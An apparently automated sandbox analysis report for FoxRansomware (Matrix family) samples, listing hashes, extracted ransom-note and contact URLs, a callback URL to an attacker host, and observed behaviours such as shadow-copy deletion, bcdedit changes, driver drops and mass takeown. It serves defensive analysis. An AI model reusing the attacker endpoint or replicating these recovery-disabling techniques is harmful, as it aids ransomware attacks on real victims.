Overview
overview
10Static
static
3FoxRansomw...65.exe
windows7-x64
10FoxRansomw...65.exe
windows10-2004-x64
10FoxRansomw...a7.exe
windows7-x64
10FoxRansomw...a7.exe
windows10-2004-x64
10FoxRansomw...20.exe
windows7-x64
10FoxRansomw...20.exe
windows10-2004-x64
10FoxRansomw...0b.exe
windows7-x64
10FoxRansomw...0b.exe
windows10-2004-x64
10FoxRansomw...53.exe
windows7-x64
10FoxRansomw...53.exe
windows10-2004-x64
10FoxRansomw...b1.exe
windows7-x64
10FoxRansomw...b1.exe
windows10-2004-x64
10Resubmissions
03-04-2024 17:37
240403-v68g6sga2w 10Analysis
-
max time kernel
149s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03-04-2024 17:37
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win7-20240319-en
Behavioral task
behavioral8
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10v2004-20240226-en
General
-
Target
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
-
Size
1.2MB
-
MD5
268360527625d09e747d9f7ab1f84da5
-
SHA1
09772eb89c9743d3a6d7b2709c76e9740aa4c4b1
-
SHA256
42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620
-
SHA512
07fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1
-
SSDEEP
24576:mLeb4QFvTn5TuJR5ezGPMy4EnBB/CPVd+5M89H:Xb/GMO6d+5M+H
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files\Google\Chrome\Application\#FOX_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\0rowjuc9.default-release\safebrowsing\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre7\lib\management\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Mahjong\ja-JP\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Multiplayer\Checkers\es-ES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe HTTP URL 13 http://fredstat.000webhostapp.com/addrecord.php?apikey=fox_api_key&compuser=IZKCKOTP|Admin&sid=bRRtOTgtRY62uG3m&phase=[FIN]7806663DF58A30EA|3811|38|3849 Process not Found File created C:\Program Files (x86)\Google\Update\1.3.36.151\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\SpiderSolitaire\fr-FR\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre7\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre7\lib\zi\Africa\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\FreeCell\de-DE\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Mahjong\de-DE\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre7\lib\deploy\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Multiplayer\Backgammon\fr-FR\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Multiplayer\Spades\fr-FR\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\ProgramData\Package Cache\{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}v14.30.30704\packages\vcRuntimeMinimum_x86\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Multiplayer\Checkers\ja-JP\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\Favorites\Microsoft Websites\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Public\Videos\Sample Videos\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\Videos\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre7\lib\images\cursors\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Minesweeper\fr-FR\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Hearts\fr-FR\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0\Cache\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\Music\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Chess\fr-FR\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 6500 bcdedit.exe 1336 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 9 2916 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS NDS5iFeg64.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" NDS5iFeg64.exe -
Executes dropped EXE 64 IoCs
pid Process 2612 NWJADauI.exe 1540 NDS5iFeg.exe 5400 NDS5iFeg64.exe 5544 NDS5iFeg.exe 5648 NDS5iFeg.exe 6896 NDS5iFeg.exe 5736 NDS5iFeg.exe 5976 NDS5iFeg.exe 6004 NDS5iFeg.exe 6108 NDS5iFeg.exe 6136 NDS5iFeg.exe 5992 NDS5iFeg.exe 7104 NDS5iFeg.exe 2676 NDS5iFeg.exe 6176 NDS5iFeg.exe 6312 NDS5iFeg.exe 6356 NDS5iFeg.exe 6484 NDS5iFeg.exe 6572 NDS5iFeg.exe 6644 NDS5iFeg.exe 2268 NDS5iFeg.exe 6740 NDS5iFeg.exe 6816 NDS5iFeg.exe 6812 NDS5iFeg.exe 2500 NDS5iFeg.exe 1820 NDS5iFeg.exe 1748 NDS5iFeg.exe 808 NDS5iFeg.exe 1888 NDS5iFeg.exe 652 NDS5iFeg.exe 448 NDS5iFeg.exe 1912 NDS5iFeg.exe 2772 NDS5iFeg.exe 2264 NDS5iFeg.exe 1636 NDS5iFeg.exe 1560 NDS5iFeg.exe 5608 NDS5iFeg.exe 2780 NDS5iFeg.exe 2372 NDS5iFeg.exe 472 NDS5iFeg.exe 1808 NDS5iFeg.exe 1376 NDS5iFeg.exe 2076 NDS5iFeg.exe 2392 NDS5iFeg.exe 2292 NDS5iFeg.exe 2616 NDS5iFeg.exe 2764 NDS5iFeg.exe 2752 NDS5iFeg.exe 2580 NDS5iFeg.exe 3108 NDS5iFeg.exe 3144 NDS5iFeg.exe 3376 NDS5iFeg.exe 3380 NDS5iFeg.exe 3456 NDS5iFeg.exe 3100 NDS5iFeg.exe 3184 NDS5iFeg.exe 3196 NDS5iFeg.exe 3272 NDS5iFeg.exe 3288 NDS5iFeg.exe 3308 NDS5iFeg.exe 1516 NDS5iFeg.exe 3804 NDS5iFeg.exe 3824 NDS5iFeg.exe 3652 NDS5iFeg.exe -
Loads dropped DLL 64 IoCs
pid Process 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 1172 cmd.exe 1540 NDS5iFeg.exe 5540 cmd.exe 5212 cmd.exe 5716 cmd.exe 5664 cmd.exe 7100 cmd.exe 5908 cmd.exe 6068 cmd.exe 7128 cmd.exe 7116 cmd.exe 2660 cmd.exe 7164 cmd.exe 2464 cmd.exe 6324 cmd.exe 6252 cmd.exe 6476 cmd.exe 6344 cmd.exe 6652 cmd.exe 6540 cmd.exe 6728 cmd.exe 6604 cmd.exe 6836 cmd.exe 6800 cmd.exe 784 cmd.exe 2096 cmd.exe 1612 cmd.exe 1876 cmd.exe 2400 cmd.exe 1476 cmd.exe 1464 cmd.exe 2480 cmd.exe 2868 cmd.exe 1448 cmd.exe 1468 cmd.exe 2360 cmd.exe 2300 cmd.exe 2104 cmd.exe 1908 cmd.exe 1028 cmd.exe 668 cmd.exe 1940 cmd.exe 320 cmd.exe 1596 cmd.exe 1576 cmd.exe 2784 cmd.exe 2460 cmd.exe 2836 cmd.exe 3088 cmd.exe 2572 cmd.exe 3416 cmd.exe 3164 cmd.exe 3084 cmd.exe 3384 cmd.exe 3464 cmd.exe 3132 cmd.exe 3264 cmd.exe 3208 cmd.exe 3316 cmd.exe 3296 cmd.exe 3568 cmd.exe 3556 cmd.exe -
Modifies file permissions 1 TTPs 64 IoCs
pid Process 6568 takeown.exe 6484 takeown.exe 4372 takeown.exe 3476 takeown.exe 5560 takeown.exe 5416 takeown.exe 3492 takeown.exe 3832 takeown.exe 5588 takeown.exe 7100 takeown.exe 5908 takeown.exe 6304 takeown.exe 4564 takeown.exe 4292 Process not Found 812 Process not Found 3748 Process not Found 4376 takeown.exe 3772 takeown.exe 6684 takeown.exe 6936 takeown.exe 4436 takeown.exe 1420 takeown.exe 6828 takeown.exe 3092 takeown.exe 856 Process not Found 4424 takeown.exe 6964 takeown.exe 6140 takeown.exe 4424 takeown.exe 5408 takeown.exe 5844 takeown.exe 1572 takeown.exe 2988 takeown.exe 816 takeown.exe 4216 takeown.exe 1560 Process not Found 3880 takeown.exe 2320 takeown.exe 4908 takeown.exe 3316 Process not Found 3324 takeown.exe 3988 takeown.exe 6380 takeown.exe 6832 takeown.exe 2696 takeown.exe 5380 takeown.exe 6048 takeown.exe 3156 takeown.exe 5564 takeown.exe 5788 takeown.exe 6064 takeown.exe 2412 Process not Found 2700 takeown.exe 3436 takeown.exe 3512 Process not Found 4548 takeown.exe 1996 takeown.exe 2880 Process not Found 6096 takeown.exe 6520 takeown.exe 3040 takeown.exe 4752 takeown.exe 4952 takeown.exe 6596 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral5/files/0x0006000000015d56-2812.dat upx behavioral5/memory/1540-3785-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/5540-7762-0x0000000000470000-0x00000000004E7000-memory.dmp upx behavioral5/memory/5544-7764-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/5544-7765-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/5648-7769-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/6896-7774-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/5736-7835-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/5976-7841-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/6004-7844-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/6108-7850-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/6136-7853-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/5992-7862-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/7104-7866-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2676-7871-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/6176-7875-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/6312-7885-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/6356-7888-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/6484-7895-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/6572-7899-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/6644-7904-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2268-7908-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/6740-7914-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/6816-7918-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/6812-7922-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2500-7925-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1820-7936-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1748-7941-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/808-7946-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1888-7948-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1888-7949-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/652-7952-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/448-7953-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1912-7956-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2772-7957-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2264-7960-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1636-7961-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1560-7969-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/5608-7970-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2780-7974-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2780-7975-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2372-7977-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/472-7979-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1808-7980-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1376-7985-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1376-7986-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2076-7991-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2076-7992-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2392-7993-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2292-7996-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2616-7997-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2764-7999-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2752-8002-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2580-8003-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3108-8004-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3144-8005-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3376-8008-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3380-8009-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3456-8010-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3100-8013-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3184-8014-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3196-8015-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3272-8016-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3288-8017-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Drops desktop.ini file(s) 40 IoCs
description ioc Process File opened for modification C:\Users\Admin\Searches\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Videos\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\JWM3U1DD\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Links\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Music\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\EQ2PZD61\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened 